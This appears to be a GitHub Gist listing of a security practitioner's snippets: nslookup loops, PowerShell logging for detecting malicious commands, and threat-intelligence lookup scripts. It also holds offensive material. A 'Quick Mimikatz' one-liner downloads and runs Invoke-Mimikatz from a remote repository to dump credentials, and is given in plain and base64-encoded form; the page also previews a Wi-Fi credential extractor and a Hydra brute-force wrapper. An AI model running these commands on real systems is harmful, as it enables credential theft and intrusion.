Skip to content

Instantly share code, notes, and snippets.

@gfoss
gfoss / Quick-Mimikatz
Last active November 20, 2024 14:51
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl
@gfoss
gfoss / Extract-WiFi-Creds.ps1
Last active October 21, 2024 17:03
Simple script to extract locally-stored Wi-Fi Credentials
#====================================#
# Extract Wi-Fi Credentials #
# greg . foss @ owasp . org #
# v0.1 -- July, 2017 #
#====================================#
# Licensed under the MIT License
<#
@gfoss
gfoss / nslookup loops
Last active April 2, 2024 11:06
Basic nslookup loops for Windows and Linux
*****WINDOWS*****
//nslookup - subnet range
c:\>for /L %i in (1,1,255) do @nslookup 10.10.10.%i [server to resolve from] 2>nul | find "Name" && echo 10.10.10.%i && @echo [ctrl+g]
//nslookup - file of ip's
NAME c:\>for /F %i in ([file.txt]) do @nslookup %i [server to resolve from] 2>nul | find "Name" && echo %i
ADDRESS c:\>for /F %i in ([file.txt]) do @nslookup %i [server to resolve from] 2>nul | find "Address" && echo %i
Or just run c:\>nslookup and paste in the list
@gfoss
gfoss / auto-hydra.sh
Created August 3, 2017 03:16
Simple Masscan + Hydra wrapper used to perform automated scans by group (organization, unit, team, etc) and generate a report on the results.
#!/bin/bash
#
# @heinzarelli
# greg . foss [at] logrhythm . com
# v0.1 - May 2017
#
function usage {
echo ""
@gfoss
gfoss / PowerShell Command Line Logging
Last active August 4, 2023 18:02
Detect and alert on nefarious PowerShell command line activity
# PowerShell Audit Logging for LogRhythm SIEM - 2015
# For detecting dangerous PowerShell Commands/Functions
Log Source Type:
MS Event Log for Win7/Win8/2008/2012 - PowerShell
Add this file to your PowerShell directory to enable verbose command line audit logging
profile.ps1
$LogCommandHealthEvent = $true
$LogCommandLifeCycleEvent = $true
@gfoss
gfoss / happy-fam.py
Last active May 24, 2022 14:40
Correlate Parent and Child Process Events via the Lacework Query Language (LQL)
#!/usr/bin/env python3
# Happy Fam
# LQL-Driven Parent and Child Process Analyzer
# Lacework Labs
# v0.1 - May 2022
# greg.foss@lacework.net
'''
Licensed under the Apache License, Version 2.0 (the "License");
@gfoss
gfoss / LQL-Runner.py
Created February 14, 2022 22:00
Execute LQL queries on the Lacework Platform
#!/usr/bin/env python3
# LQL Runner
# Lacework Labs
# v0.1 - February 2022
# greg.foss@lacework.net
#####################################################################################
# usage: lql-runner.py [-h] [-e LW_ENV] [-q QUERY] [-t DAYS] [-c] [-j] [-o FILENAME]
#
@gfoss
gfoss / Greynoise IP Analysis
Last active February 12, 2022 00:18
Quickly obtain reputation information for IP Addresses from Greynoise - for both single and bulk IP's
#!/usr/bin/env python3
# Greynoise Community Edition - IP Check
# v0.1 - February, 2022
# greg.foss@owasp.org
'''
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
@gfoss
gfoss / VirusTotal Domain Analysis
Last active February 5, 2022 02:11
Quickly obtain reputation information for Domains from VirusTotal - for both single and bulk Domains
#!/usr/bin/env python3
# VirusTotal DNS Check
# v0.1 - February, 2022
# greg.foss@owasp.org
'''
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
@gfoss
gfoss / VirusTotal Hash Analysis
Last active February 3, 2022 20:55
Quickly obtain reputation information for Hashes from VirusTotal - for both single and bulk Hahes
#!/usr/bin/env python3
# VirusTotal Hash Check
# v0.3 - February, 2022
# greg.foss@owasp.org
'''
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at